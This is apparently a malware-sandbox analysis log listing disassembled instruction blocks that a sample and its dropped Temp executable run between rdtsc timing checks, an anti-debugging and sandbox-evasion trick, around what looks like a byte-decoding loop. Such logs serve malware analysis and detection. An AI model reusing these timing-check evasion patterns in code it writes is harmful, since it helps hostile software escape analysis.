Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004042DE second address: 0000000000404300 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404300 second address: 0000000000404306 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404306 second address: 0000000000404079 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F47FC825387h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404079 second address: 000000000040407F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040407F second address: 000000000040409B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040409B second address: 00000000004040A1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004040A1 second address: 00000000004040C1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825640h 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004040C1 second address: 00000000004040C7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004040C7 second address: 00000000004040E8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825641h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004040E8 second address: 00000000004040EE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004040EE second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Eh 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040434E second address: 0000000000404354 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403BD4 second address: 0000000000403BDA instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403BDA second address: 0000000000403BFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E053h 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403BFC second address: 0000000000403C02 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C02 second address: 0000000000403C23 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 00403F45h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C23 second address: 0000000000403C29 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C29 second address: 0000000000403C43 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Ch 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C43 second address: 0000000000403C49 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C49 second address: 0000000000403C6C instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E051h 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C6C second address: 0000000000403C72 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C72 second address: 0000000000403C92 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 00404779h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C92 second address: 0000000000403C98 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C98 second address: 0000000000403CB7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 00403FA9h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403CB7 second address: 0000000000403CBD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403CBD second address: 0000000000403FB0 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Fh 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403FB0 second address: 0000000000403FB6 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403FB6 second address: 0000000000403FD3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403FD3 second address: 0000000000403FD9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403FD9 second address: 0000000000403FFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403FFC second address: 0000000000404002 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404002 second address: 0000000000404029 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E053h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404029 second address: 000000000040402F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040402F second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E053h 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F47FCB7E0FAh 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404109 second address: 000000000040410F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040410F second address: 0000000000404137 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007F47FCB7E25Dh 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404137 second address: 000000000040413D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040413D second address: 0000000000404161 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E054h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404161 second address: 0000000000404167 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404167 second address: 000000000040417F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E049h 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040417F second address: 0000000000404185 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404185 second address: 00000000004041A9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E054h 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041A9 second address: 00000000004041AF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041AF second address: 00000000004041D6 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E057h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041D6 second address: 00000000004041DC instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041DC second address: 00000000004041F9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Ch 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041F9 second address: 00000000004041FF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041FF second address: 0000000000404223 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E054h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404223 second address: 0000000000404229 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404229 second address: 0000000000404245 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404245 second address: 000000000040424B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040424B second address: 000000000040426A instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Fh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040426A second address: 0000000000404270 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404270 second address: 000000000040428F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E050h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040428F second address: 0000000000404295 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404295 second address: 00000000004042B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004042B3 second address: 00000000004042B9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004042B9 second address: 00000000004042D8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004042D8 second address: 00000000004042DE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004042DE second address: 0000000000404300 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E053h 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404300 second address: 0000000000404306 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404306 second address: 0000000000404079 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Fh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F47FCB7DD97h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404079 second address: 000000000040407F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040407F second address: 000000000040409B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040409B second address: 00000000004040A1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040A1 second address: 00000000004040C1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E050h 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040C1 second address: 00000000004040C7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040C7 second address: 00000000004040E8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E051h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040E8 second address: 00000000004040EE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040EE second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Eh 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040434E second address: 0000000000404354 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403BDA second address: 0000000000403BFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C02 second address: 0000000000403C23 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 00403F45h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C29 second address: 0000000000403C43 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C49 second address: 0000000000403C6C instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825641h 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C72 second address: 0000000000403C92 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 00404779h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C98 second address: 0000000000403CB7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 00403FA9h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403CBD second address: 0000000000403FB0 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403FB6 second address: 0000000000403FD3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403FD9 second address: 0000000000403FFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404002 second address: 0000000000404029 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
